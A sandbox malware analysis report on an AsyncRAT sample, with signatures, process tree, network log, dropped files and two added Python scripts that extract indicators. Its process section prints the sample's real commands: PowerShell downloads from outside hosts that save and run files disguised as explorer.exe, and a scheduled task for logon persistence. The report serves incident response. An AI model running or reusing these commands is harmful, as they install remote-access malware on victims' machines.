Malware Analysis Report

2025-01-02 12:13

Sample ID 240418-h1wj7sed62
Target 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
Tags
asyncrat default rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54

Threat Level: Known bad

The file 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat default rat

Asyncrat family

Async RAT payload

AsyncRat

Async RAT payload

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-18 07:12

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-18 07:12

Reported

2024-04-18 07:15

Platform

win10v2004-20240412-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\system.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4004 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4004 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2224 wrote to memory of 3408 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 3408 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 4912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 4912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4004 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4004 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4004 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 4004 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 464 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 464 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2928 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2928 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2224 wrote to memory of 1852 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 1852 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2928 wrote to memory of 4140 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2928 wrote to memory of 4140 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 4140 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 4140 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 1748 wrote to memory of 1328 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1328 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 1712 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 1712 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 3288 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 3288 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7E67.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
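The command lines above are the whole chain in miniature: two PowerShell WebClient downloads into %Temp% under names that imitate explorer.exe (a capital I standing in for the lowercase l in ExpIorer.exe, and an inserted letter in ExplIorer.exe), a scheduled task named "system" that runs the dropped copy at every logon with the highest run level the user can grant, and a temp batch file that sleeps with timeout 3 before starting that copy. The script below is an added example, not part of the sandbox report: it parses those command lines (copied from this section as constructed input) and extracts the indicators a responder would pivot on. The KNOWN_BINARIES list, the confusable-character map and the user-writable-path test are this example's own assumptions.

```python
"""Pull pivotable indicators out of the process command lines listed above.

Added example, not part of the sandbox report. COMMAND_LINES is copied from
the behavioral2 Processes section as constructed input; KNOWN_BINARIES,
CONFUSABLES and USER_WRITABLE are this example's own assumptions.
"""
import re
from typing import Optional

# The doubled backslashes before ExpIorer.exe are in the report as written.
COMMAND_LINES = r"""
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7E67.tmp.bat""
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
timeout 3
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
""".strip().splitlines()

DOWNLOAD = re.compile(r"DownloadFile\('(?P<url>[^']+)',\s*'(?P<dest>[^']+)'\)")
TASK = re.compile(r"\bschtasks\s+/create\b(?P<args>.*)", re.IGNORECASE)
DELAY = re.compile(r"^\s*timeout\s+(?:/t\s+)?(\d+)", re.IGNORECASE)
EXE_NAME = re.compile(r"[\w.-]+\.exe\b", re.IGNORECASE)
# Locations a standard user can write to (assumption: extend per environment).
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)

# Characters commonly swapped for look-alikes in dropped file names (assumption).
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o"})
# Legitimate Windows binary names the lookalike check compares against (assumption).
KNOWN_BINARIES = {"explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe",
                  "winlogon.exe", "services.exe", "conhost.exe"}


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance; small enough to inline here."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(filename: str) -> Optional[str]:
    """Return the legitimate binary name `filename` imitates, or None.

    Confusables are normalised before lowercasing so that the capital I in
    ExpIorer.exe becomes an l; an edit distance of 1 then also catches the
    inserted letter in ExplIorer.exe.
    """
    plain = filename.lower()
    normalised = filename.translate(CONFUSABLES).lower()
    for known in KNOWN_BINARIES:
        if plain != known and edit_distance(normalised, known) <= 1:
            return known
    return None


def parse_task(cmd: str) -> Optional[dict]:
    """Extract trigger, run level, name and target from a schtasks /create line."""
    m = TASK.search(cmd)
    if not m:
        return None
    args = m["args"]

    def option(flag: str) -> Optional[str]:
        # Values may be bare, "double-quoted", or '"nested"' as in the report.
        hit = re.search(rf"/{flag}\s+(\"[^\"]*\"|'[^']*'|\S+)", args, re.IGNORECASE)
        return hit.group(1).strip("'\"") if hit else None

    return {"name": option("tn"), "trigger": option("sc"),
            "run_level": option("rl"), "target": option("tr")}


def triage(command_lines) -> dict:
    """Collect downloads, lookalike names, persistence tasks and stalling delays."""
    findings = {"downloads": [], "lookalikes": {}, "tasks": [], "delays": []}
    for cmd in command_lines:
        for m in DOWNLOAD.finditer(cmd):
            pair = (m["url"], m["dest"])
            if pair not in findings["downloads"]:
                findings["downloads"].append(pair)
        for name in EXE_NAME.findall(cmd):
            imitated = lookalike_of(name)
            if imitated:
                findings["lookalikes"][name] = imitated
        task = parse_task(cmd)
        if task:
            task["user_writable_target"] = bool(USER_WRITABLE.search(task["target"] or ""))
            findings["tasks"].append(task)
        delay = DELAY.match(cmd)
        if delay:
            findings["delays"].append(int(delay.group(1)))
    return findings


if __name__ == "__main__":
    for key, value in triage(COMMAND_LINES).items():
        print(key, value)
```

On this input the script returns the two download hosts with their %Temp% targets, maps both dropped names to explorer.exe, records two registrations of the "system" task (trigger onlogon, run level highest, target under AppData, so a standard user can overwrite what the task runs), and the 3-second delay. The same checks apply unchanged to process-creation telemetry (for example Sysmon event ID 1 command lines) on a live host.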

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 163.233.34.23.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp
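Read against the command lines, this table says something the signature list does not: xcu.exgaming.click and xcu5.exgaming.click appear only as DNS queries to the sandbox resolver, no TCP session to either follows, and neither ExpIorer.exe nor ExplIorer.exe shows up in the Files list, so the second stage was not retrieved during this run (the names did not resolve, or the download was refused). The one session attributable to the sample is pastebin.com over 443, which matches the "Legitimate hosting services abused" signature; AsyncRAT builds can be configured to read their C2 address from a paste. The g.bing.com and 52.111.229.43 traffic looks like Windows background activity, and the in-addr.arpa rows are reverse lookups of the peer addresses, issued by the sample or by the analysis environment (the table does not say which). The script below is an added example, not part of the report: it parses the rows above (copied as constructed input) and separates names that were resolved only from names that were actually connected to. PASTE_SERVICES is this example's own list.

```python
"""Classify the Network rows above: DNS-only names versus names with a TCP session.

Added example, not part of the sandbox report. NETWORK_ROWS is copied from the
behavioral2 Network table as constructed input; PASTE_SERVICES is this
example's own assumption.
"""

NETWORK_ROWS = """
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 163.233.34.23.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp
""".strip().splitlines()

# Public paste/text hosting sites malware uses for stage or C2 config (assumption).
PASTE_SERVICES = {"pastebin.com", "paste.ee", "hastebin.com", "rentry.co"}


def parse_row(row: str) -> dict:
    """Split 'Country Destination [Domain] Proto'; the domain column may be absent."""
    parts = row.split()
    if len(parts) not in (3, 4):
        raise ValueError(f"unexpected row: {row!r}")
    ip, port = parts[1].rsplit(":", 1)
    return {"country": parts[0], "ip": ip, "port": int(port),
            "domain": parts[2] if len(parts) == 4 else None, "proto": parts[-1]}


def ptr_to_ip(name: str) -> str:
    """Turn a reverse-lookup name (d.c.b.a.in-addr.arpa) back into a.b.c.d."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        raise ValueError(f"not a PTR name: {name!r}")
    return ".".join(reversed(name[: -len(suffix)].split(".")))


def summarise(rows) -> dict:
    queried, ptr_targets, connections = set(), set(), {}
    for rec in map(parse_row, rows):
        if rec["proto"] == "udp" and rec["port"] == 53 and rec["domain"]:
            if rec["domain"].endswith(".in-addr.arpa"):
                ptr_targets.add(ptr_to_ip(rec["domain"]))
            else:
                queried.add(rec["domain"])
        elif rec["proto"] == "tcp":
            # Key by the name the sandbox attributed to the session, else by IP.
            connections[rec["domain"] or rec["ip"]] = (rec["ip"], rec["port"])
    connected_ips = {ip for ip, _ in connections.values()}
    return {
        "queried": queried,
        "connections": connections,
        # Resolved but never connected to: the stage behind these was not observed.
        "dns_only": queried - set(connections),
        "paste_services": queried & PASTE_SERVICES,
        "ptr_targets": ptr_targets,
        # Reverse lookups that point back at hosts this run actually talked to.
        "ptr_of_own_peers": ptr_targets & connected_ips,
        # Sessions the sandbox could not tie to a preceding forward lookup.
        "unlabelled_tcp": {k for k in connections if k not in queried},
    }


if __name__ == "__main__":
    for key, value in summarise(NETWORK_ROWS).items():
        print(key, value)
```

dns_only is the set to act on: a name the sample resolved but never reached means the next stage was not observed, not that it does not exist. Re-detonating with the domain reachable, or checking passive DNS for the exgaming.click names, is the natural follow-up; the pastebin.com session is the one to retrieve and decode for the C2 address.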

Files

memory/4004-0-0x00000000005C0000-0x00000000005D8000-memory.dmp

memory/4004-1-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4004-3-0x000000001B400000-0x000000001B410000-memory.dmp

memory/3408-14-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/3408-13-0x000001FFB5430000-0x000001FFB5452000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0njy1pvn.3ai.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3408-15-0x000001FFB5470000-0x000001FFB5480000-memory.dmp

memory/3408-16-0x000001FFB5470000-0x000001FFB5480000-memory.dmp

memory/3408-19-0x000001FFB5B70000-0x000001FFB5CDA000-memory.dmp

memory/3408-20-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4912-22-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4912-23-0x000001E8BD290000-0x000001E8BD2A0000-memory.dmp

memory/4912-24-0x000001E8BD290000-0x000001E8BD2A0000-memory.dmp

